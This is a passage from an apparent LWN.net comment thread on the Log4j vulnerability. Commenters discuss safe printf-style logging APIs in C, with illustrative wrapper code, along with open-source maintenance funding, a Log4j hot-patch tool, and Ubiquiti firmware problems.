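 * truncated to fit and always NUL-terminated (n must be > 0). */
static void log_line(char *out, size_t n, const char *msg)
{
    size_t len = strlen(msg);
    if (len >= n)
        len = n - 1;
    memcpy(out, msg, len);
    out[len] = '\0';
}

/* Hypothetical formatted logger ("syslogf"): the trailing f signals that
 * the third argument is a printf-style format. The attribute (GCC/Clang)
 * lets the compiler check fmt against the remaining arguments. */
__attribute__((format(printf, 3, 4)))
static void log_linef(char *out, size_t n, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(out, n, fmt, ap);
    va_end(ap);
}
```

In real code the finished line would then go to syslog(LOG_INFO, "%s", out), since syslog(3) itself still treats its second argument as a format.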

The Log4j mess

Posted Dec 14, 2021 23:43 UTC (Tue) by NYKevin (subscriber, #129325) [Link] (5 responses)

I would go further. IMHO there are basically two cases:

1. You need interpolation. Then there should actually be at least one string interpolation command somewhere in the format string, and so you need at least two arguments (the format string and whatever argument the first interpolation takes).
2. You don't need interpolation. Then you should either be writing printf("%s", x) (or whatever printf-like function you're calling instead of printf), or you should be using a convenience wrapper that does that for you. Therefore, you *still* need at least two arguments to printf.

If those two cases were the only two cases that we cared about, then we could just ban one-argument printf (and printf-likes) altogether (e.g. using a lint rule).

Unfortunately, there's a third case:

3. You are dynamically building a format string which may or may not actually contain any interpolation commands.

You could keep track of whether you've added an interpolation as you build the string, and then select case (1) or case (2) at runtime. At first blush, this looks like needless and pedantic bookkeeping, but as it turns out, C variadics are so bad that you already have to do that anyway (or something just as verbose and ugly, involving a partial va_copy of an existing va_list, such that the copy can dynamically be empty or non-empty). So case (3) basically doesn't exist, unless you are working in an environment or language where variadics are not C-like, at which point you can probably do a runtime check that the number of arguments passed matches the number implied by the format string.
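A sketch of that runtime bookkeeping for case (3), with a hypothetical `render_count` that only sometimes appends an interpolation and then picks case (1) or case (2) to match. It assumes the static text contains no `%`; otherwise it would need escaping as `%%` on the case (1) path but not on the case (2) path, which is part of what makes this approach error-prone.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical: builds a format string that may or may not contain an
 * interpolation, records whether it does, and calls snprintf to match. */
static int render_count(char *out, size_t n, int show_count, int count)
{
    char fmt[32] = "items";      /* static text, assumed to contain no '%' */
    int has_interp = 0;

    if (show_count) {
        strcat(fmt, ": %d");     /* adds exactly one int interpolation */
        has_interp = 1;
    }

    if (has_interp)
        return snprintf(out, n, fmt, count);   /* case (1): format + argument */
    return snprintf(out, n, "%s", fmt);        /* case (2): logged verbatim */
}
```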

The only exception to this would be if your API takes a format string and a C array, but no size argument. Such APIs have never been typical for printf-like functions, because the caller would have to allocate and initialize an array, take pointers to all of the arguments, cast everything into pointer-to-void, etc. and nobody wants to do that just to print a string. So I'm perfectly happy to declare that case as "You made the weird API, now you get to live with its shortcomings."

The Log4j mess

Posted Dec 15, 2021 17:43 UTC (Wed) by dskoll (subscriber, #1630) [Link] (4 responses)

I don't think the third case is worth supporting for a logger, but if someone wants to, then the logical name would be vsyslogf(), analogous to vfprintf().

My point is that the name syslog doesn't alert a programmer to the fact that the function takes printf-like format strings, whereas syslogf is more likely to.
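The v-prefixed convention looks roughly like this, again with hypothetical names (`msg_vformat`, `msg_format`, `msg_warnf`) and a buffer standing in for syslog(3). The variadic function only packages its arguments into a `va_list` and forwards them, so other variadic wrappers can reuse the `v` form. (glibc and the BSDs already ship a non-POSIX vsyslog(3) along these lines.)

```c
#include <stdarg.h>
#include <stdio.h>

/* Hypothetical "vsyslogf" analogue: takes an already-started va_list,
 * like vfprintf(3). Returns what vsnprintf returns. */
static int msg_vformat(char *out, size_t n, const char *fmt, va_list ap)
{
    return vsnprintf(out, n, fmt, ap);
}

/* Hypothetical "syslogf" analogue: packages its arguments and forwards. */
__attribute__((format(printf, 3, 4)))
static int msg_format(char *out, size_t n, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int r = msg_vformat(out, n, fmt, ap);
    va_end(ap);
    return r;
}

/* A caller-defined wrapper that adds a prefix by reusing the v-form. */
__attribute__((format(printf, 3, 4)))
static int msg_warnf(char *out, size_t n, const char *fmt, ...)
{
    int p = snprintf(out, n, "warning: ");
    if (p < 0 || (size_t)p >= n)
        return p;                        /* error, or no room left */
    va_list ap;
    va_start(ap, fmt);
    int r = msg_vformat(out + p, n - (size_t)p, fmt, ap);
    va_end(ap);
    return r < 0 ? r : p + r;            /* total length, like snprintf */
}
```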

The Log4j mess

Posted Dec 15, 2021 20:09 UTC (Wed) by NYKevin (subscriber, #129325) [Link]

Note that vfprintf() takes a va_list, not an array. You cannot dynamically allocate and initialize va_list objects (at least, not in standard portable C), so even vfprintf() does not actually support this use case in a reasonable fashion (because there would be no way to determine the arity dynamically at runtime). As I briefly alluded to, you can use va_arg (not va_copy, although that does preserve the truncation) to shorten a va_list by consuming elements from left to right, which in theory could be used to build a va_list of fixed (statically determined) types and with a static maximum arity, but that's not really adequate for the general case. This is what I mean by "C variadics are terrible."
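To make the va_arg remark concrete, here is a sketch with a hypothetical `format_tail` that consumes a number of leading `int` arguments with `va_arg` and then hands the partly consumed `va_list` to `vsnprintf`, which the C standard permits (the v-functions accept a list initialized by va_start "and possibly subsequent va_arg calls"). It only works because the skipped arguments' type is fixed by the function's contract, and the caller still has to write every argument out at the call site; nothing here builds a `va_list` of runtime-chosen arity.

```c
#include <stdarg.h>
#include <stdio.h>

/* Hypothetical: discards the first `skip` variadic arguments, which the
 * caller promises are all int, then formats the remaining ones with fmt.
 * vsnprintf continues from wherever va_arg left ap. */
static int format_tail(char *out, size_t n, int skip, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    for (int i = 0; i < skip; i++)
        (void)va_arg(ap, int);           /* truncate from the left */
    int r = vsnprintf(out, n, fmt, ap);
    va_end(ap);
    return r;
}
```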

The Log4j mess

Posted Dec 17, 2021 16:55 UTC (Fri) by ianmcc (subscriber, #88379) [Link] (2 responses)

Why do interpolation at the same time as writing to the log? Wouldn't it be more sensible to separate those tasks, and if you want interpolation, spell it like syslog(LOG_INFO, format("%s", attacker_controlled_msg))? (Yes, it's too late for syslog(3), but in new code...)

The Log4j mess

Posted Dec 20, 2021 17:50 UTC (Mon) by jezuch (subscriber, #52988) [Link]

In short: performance. You don't want to pay the price of formatting the message if it isn't going to be used because, for example, its priority is below the configured log level. Generally you want lots of DEBUG logs that are turned off by default, so making them cheap is important. Making them convenient is important too: you could check whether the log level is enabled before every call, but that's extremely annoying and ugly as hell.

So in effect, modern logging frameworks take the format string and arguments instead of a pre-formatted message, and some static analysis tools will scream at you if you don't use them that way.
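A C sketch of that trade-off, with a hypothetical `log_at` function and `LOG_DEBUG` macro (Java frameworks such as SLF4J and Log4j 2 do the equivalent with `{}` placeholders). Because the format and arguments arrive separately, the level check runs before any formatting; the macro variant also skips evaluating the arguments themselves. The counter exists only to make the skipped work visible.

```c
#include <stdarg.h>
#include <stdio.h>

enum level { LVL_DEBUG, LVL_INFO, LVL_WARN };

/* Hypothetical logger state: messages below `threshold` are dropped. */
static enum level threshold = LVL_INFO;
static int formatted_count = 0;          /* messages actually formatted */
static char last_line[128];

/* Formatting only happens once the cheap level check has passed. */
__attribute__((format(printf, 2, 3)))
static void log_at(enum level lvl, const char *fmt, ...)
{
    if (lvl < threshold)
        return;                          /* early exit, nothing formatted */
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(last_line, sizeof last_line, fmt, ap);
    va_end(ap);
    formatted_count++;
}

/* Macro variant: when DEBUG is off, the arguments are not even evaluated. */
#define LOG_DEBUG(...) \
    do { if (LVL_DEBUG >= threshold) log_at(LVL_DEBUG, __VA_ARGS__); } while (0)
```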

The Log4j mess

Posted Jan 3, 2022 12:24 UTC (Mon) by immibis (subscriber, #105511) [Link]

It's C. What kind of value is format going to return?
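One plausible answer, as a sketch: a hypothetical `format()` that returns a heap-allocated string which the caller must free(), sized with a first measuring `vsnprintf` pass. It needs `va_copy` because a `va_list` cannot be reused after it has been consumed. The GNU/BSD `asprintf` extension does much the same thing.

```c
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical format(): returns a malloc'd string, or NULL on failure.
 * The caller owns the result and must free() it. */
__attribute__((format(printf, 1, 2)))
static char *format(const char *fmt, ...)
{
    va_list ap, ap2;
    va_start(ap, fmt);
    va_copy(ap2, ap);                        /* second pass needs its own copy */
    int len = vsnprintf(NULL, 0, fmt, ap);   /* measure only */
    va_end(ap);

    char *s = NULL;
    if (len >= 0 && (s = malloc((size_t)len + 1)) != NULL)
        vsnprintf(s, (size_t)len + 1, fmt, ap2);
    va_end(ap2);
    return s;
}
```

The ownership burden shows up at every call site: the inline syslog(LOG_INFO, format(...)) form would leak the buffer, and it would still hand the formatted text to syslog(3) as a format string. A correct call looks more like `char *m = format("%s", msg); if (m) { syslog(LOG_INFO, "%s", m); free(m); }`.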

The Log4j mess

Posted Dec 12, 2021 19:26 UTC (Sun) by flussence (guest, #85566) [Link] (8 responses)

Enterprise is learning, in the most deserved way, that there's no free lunch. Pay the underfunded hobbyists your business relies on, or you'll end up paying for your negative externalities a different way.

The rest of us are going to have to live with jndi spam in our error logs for *months* now...

Apache Log4j

Posted Dec 12, 2021 21:53 UTC (Sun) by tialaramex (subscriber, #21167) [Link] (7 responses)

The full name of the project is Apache Log4j.

As you will know, Apache promotes the Apache Way, including Responsible Oversight which ensures problems like this don't happen. Its Platinum sponsors pay at least $125k per year and its total fundraising brings in several million dollars. Hardly a "free lunch".

Apache Log4j

Posted Dec 12, 2021 23:48 UTC (Sun) by k8to (guest, #15413) [Link] (3 responses)

Despite this, log4j has been a mostly unmaintained ball of hair for the past 13 years at least. I have had to explain to "enterprise" customers that the bugs they were suggesting were my company's fault were entirely inside the log4j package they were using. Sometimes those bugs would even get fixed, but then not deployed properly for years. Sometimes they would just never get fixed.

Apache Log4j

Posted Dec 12, 2021 23:49 UTC (Sun) by k8to (guest, #15413) [Link]

If unclear, the customer was using log4j, not us.

Apache Log4j

Posted Dec 14, 2021 9:35 UTC (Tue) by taladar (subscriber, #68407) [Link] (1 responses)

I think the problem is largely that Java Open Source projects and Enterprise Open Source projects in general are often the result of unbearable pain at some employer that people then fix by writing some library in their free time because their employer is too cheap to do it properly on the clock. Obviously that same Enterprise employer is then also too cheap to pay for maintenance of the code. At some point the good programmer leaves the bad employer and has no need for the code any more so it goes unmaintained, especially for boring solutions to boring problems written in boring languages.

Apache Log4j

Posted Dec 16, 2021 9:07 UTC (Thu) by nim-nim (subscriber, #34454) [Link]

It’s not a problem in the Open Source part, it’s a generic problem in *Enterprise* software.

In *Enterprise* software the interactions between participants are mediated by contracts and licenses that effectively prevent fixing software the natural way. Thus the main “feature” of Enterprise software is inventing setups that allow executing new code without invoking past contracts.

As the commit that added the problematic feature to Log4j states, it’s for the “convenience” of not changing things where they belong, stupid.

Java and the Apache Foundation (which is mostly Enterprise-oriented Java software, despite a non-Java software front) were the poster children of this kind of development process. They were and are deeply hostile to free software, because you just don’t fix things upstream; you find ways to work around them locally using things like JNDI or its modern equivalents. Of course they’ve lost a lot of their shine in recent years, now that someone needs to process the accrued technical debt (and the inefficiencies have crushed the ecosystem, leaving a single remaining vendor for Hadoop & friends).

And if you think non-Open-Source Java development is any different than the one you see Apache foundation side I have prime real estate on the moon to sell you.

(the static linking/containerish guys are mostly the same crowd using new languages to make the same mistakes; in a decade or so they’ll be all over CERT bulletins fixing the technical debt they’re busy creating right now).

Apache Log4j

Posted Dec 12, 2021 23:51 UTC (Sun) by flussence (guest, #85566) [Link] (1 responses)

Apache also promotes OpenOffice, so it calling itself "Responsible" in this context is only slightly more believable than if Amazon or BP did it.

Setting up an obfuscatory bureaucracy and calling it "open source" is a very effective way to keep large sums flowing laterally into certain pockets. With sums like that flying around over software that can't even charitably be described as in palliative care, never mind maintenance mode, some people absolutely are getting free lunch - at a very fancy restaurant.

This does not include Log4j2's actual developers, who — according to half the internet examining actual breakdowns of where that money goes, and also what they themselves have said in the frustration of having an angry mob yelling directly at them — are completely unpaid for all this apart from three (3) people donating to them on tip jar sites.

I hope someone loses a billion dollars from this.

Apache Log4j

Posted Dec 13, 2021 0:23 UTC (Mon) by mathstuf (subscriber, #69389) [Link]

> I hope someone loses a billion dollars from this.

Emphasis on the "one". If the pain is too spread out, we'll just find ourselves in another tragedy-of-the-commons situation where no single entity is willing to step up ("well, why me and not anyone/everyone else?").

Apache Log4j

Posted Dec 14, 2021 10:19 UTC (Tue) by smurf (subscriber, #17840) [Link]

> including Responsible Oversight which ensures problems like this don't happen

Excuse me while I fall off my chair, laughing madly.

This would be slightly more believable if a wet fart of the money the Apache Foundation rakes in every year actually went to the people responsible for maintaining all that software under its umbrella. Particularly when it's a central piece of infrastructure.

Well … apparently it was not possible to learn anything from the openssl mess. So we have to repeat it. (Only worse.)

The Log4j mess

Posted Dec 12, 2021 21:38 UTC (Sun) by nickodell (subscriber, #125165) [Link] (4 responses)

Worth noting that someone has posted a utility which can live patch out the vulnerable Log4j feature, without restarting any java processes.

Link: https://github.com/corretto/hotpatch-for-apache-log4j2

The Log4j mess

Posted Dec 13, 2021 14:20 UTC (Mon) by nix (subscriber, #2304) [Link] (3 responses)

Oh great! This means I can fix my unifi controller without being forced to upgrade it (in the last few years, every single controller or firmware update from unifi has broken something: small if you're lucky, total-bricking if you're not).

The right thing to do is decommission all my unifi stuff so I can stop running this horrible controller, but I've been putting that off for years... and at least this means people can't own my machines by just getting the controller to log something (which is amazingly easy for a remote attacker to do -- say, from outside the house).

The Log4j mess

Posted Dec 14, 2021 12:48 UTC (Tue) by nye (subscriber, #51576) [Link] (2 responses)

What devices do you use where this has been a problem? For me, the only issue I've ever had with updating the controller and firmware was when I had to switch my inform URL to non-HTTPS temporarily, to get out of a circular problem where I couldn't update my USG firmware to a version that would support the new-style Let's Encrypt certificates. Other than that, it's been bulletproof for me.

I'm using a USG and some UAP-AC-PROs, so I'm interested in seeing what hardware I should avoid buying in the future!

The Log4j mess

Posted Dec 14, 2021 21:12 UTC (Tue) by nix (subscriber, #2304) [Link] (1 responses)

Original UAP. Four bricking incidents in the last two years, all thank god recoverable via TFTP. Three incidents of major functionality breakage like completely fubaring broadcasts. Not one fix reported in the horrible excuse for changelogs they emit these days. I don't upgrade the firmware any more, and since two controller updates led to UAPs that were no longer adoptable I don't upgrade the controller any more either.

Ubiquiti has *really* gone downhill -- and that's before we discovered that the head of cloud there was an extortionist. He got his position by basically lying nonstop to the (apparently clueless) CEO and terrifying him, then proceeded to try to extort money out of his employer, and possibly (it remains unclear) was actually the source of a credentials compromise. He was also said to be so unpleasant to work with that he was a major reason why most of the competent developers Ubiquiti employed reportedly left, leaving their software development in a seriously parlous state.

Ubiquiti have been very hot on trying to do absolutely all their admin via cloudy stuff, which was extremely questionable in any case for *networking* gear, i.e. the stuff which needs to be properly configured if you're to get to the cloud in the first place -- but now that it turns out that the head cloudy guy was *this* sort of person, one wonders if the whole thing was encouraged in the first place specifically to get lots of juicy credentials from lots of people.

The Log4j mess

Posted Dec 15, 2021 9:05 UTC (Wed) by smurf (subscriber, #17840) [Link]

Which is why I only use Ubiquiti hardware that can be (and in fact is, five minutes after unboxing) reflashed to run OpenWRT.

The Log4j mess

Posted Dec 13, 2021 3:51 UTC (Mon) by net_benji (subscriber, #75195) [Link] (1 responses)

I didn't understand the LDAP connection from the Ars Technica article, but the following summary explains it more clearly:
https://www.fastly.com/blog/digging-deeper-into-log4shell...

The Log4j mess

Posted Dec 13, 2021 23:24 UTC (Mon) by camhusmj38 (subscriber, #99234) [Link]

Thanks for sharing this. It was very useful.